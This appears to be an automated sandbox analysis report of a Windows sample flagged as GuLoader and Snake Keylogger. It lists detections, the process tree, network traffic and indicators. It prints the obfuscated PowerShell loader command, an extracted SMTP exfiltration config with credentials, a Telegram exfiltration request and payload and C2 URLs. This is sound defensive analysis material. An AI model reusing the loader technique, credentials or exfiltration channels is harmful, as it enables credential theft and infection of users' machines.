Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1518332
MD5: 7fbb332b55f872e61c8307e0b5242287
SHA1: b499466240ef01da4a2cf380d709752b2e44232a
SHA256: 9845acc424512cc5b0c67de96ce917624b5e80ee95ea4ea6a7cbc37b7c03ef63
Tags: exe, user-abuse_ch

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7FBB332B55F872E61C8307E0B5242287)
    • powershell.exe (PID: 7496 cmdline: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 8168 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

{"Exfil Mode": "SMTP", "Username": "nicklog@wxtp.store", "Password": "7213575aceACE@@  ", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Source | Rule | Description | Author
00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000007.00000002.2695880589.0000000022EE5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.2217265751.000000000B997000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: wabmig.exe PID: 8168 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: wabmig.exe PID: 8168 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)", CommandLine: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7420, ParentProcessName: file.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)", ProcessId: 7496, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T16:01:30.954113+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
2024-09-25T16:01:34.877195+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | TCP
2024-09-25T16:01:39.227302+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | TCP
2024-09-25T16:01:28.683636+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP
2024-09-25T16:01:30.386762+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | TCP
2024-09-25T16:01:31.683648+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49716 | 132.226.247.73 | 80 | TCP
2024-09-25T16:01:26.987824+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49710 | 185.29.11.53 | 80 | TCP

AV Detection

Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nicklog@wxtp.store", "Password": "7213575aceACE@@ ", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe | ReversingLabs: Detection: 21%
Source: file.exe | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2216409652.0000000008695000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.000000000750D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2216409652.000000000864F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405C63
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402910 FindFirstFileW | 0_2_00402910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004068B4 FindFirstFileW,FindClose | 0_2_004068B4
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 0094F8E9h | 7_2_0094F631
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 0094FD41h | 7_2_0094FA8D
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D431E0h | 7_2_25D42DC8
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D42C19h | 7_2_25D42968
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D40D0Dh | 7_2_25D40B30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D41697h | 7_2_25D40B30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D431E0h | 7_2_25D42DBE
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4DC51h | 7_2_25D4D9A8
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4D7F9h | 7_2_25D4D550
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D431E0h | 7_2_25D4310E
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4D3A1h | 7_2_25D4D0F8
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4CF49h | 7_2_25D4CCA0
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 7_2_25D40040
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4FAB9h | 7_2_25D4F810
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4F661h | 7_2_25D4F3B8
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4F209h | 7_2_25D4EF60
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4EDB1h | 7_2_25D4EB08
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4E959h | 7_2_25D4E6B0
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4E501h | 7_2_25D4E258
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 4x nop then jmp 25D4E0A9h | 7_2_25D4DE00

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49710 -> 185.29.11.53:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET /fhSIfglR68.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 185.29.11.53 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | TCP traffic detected without corresponding DNS query: 185.29.11.53
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 25 Sep 2024 14:01:41 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: wabmig.exe, 00000007.00000002.2683738778.0000000007843000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2683416849.0000000007580000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://185.29.11.53/fhSIfglR68.bin
Source: wabmig.exe, 00000007.00000002.2683738778.0000000007843000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.11.53/fhSIfglR68.bin;
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2212699188.00000000074A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft0Wq
Source: file.exe, file.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20a
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022F9C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: wabmig.exe, 00000007.00000002.2695880589.0000000022F97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E55000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\SysWOW64\sennepssovsen
            Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406DC6
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040759D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04C0EBD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04C0F4A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04C0E890
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0775C80E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094C147
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094D278
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094C738
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094E988
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_009469A0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094CA08
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094CCD8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_00943E13
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094CFA9
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_00946FC8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_00945370
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094F631
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094E97B
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_00943A91
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_0094FA8D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D49548
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D42968
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D49C18
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D45028
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D417A0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D40B30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D41E80
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4DDFF
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4D999
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4D9A8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4D550
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4295A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4D545
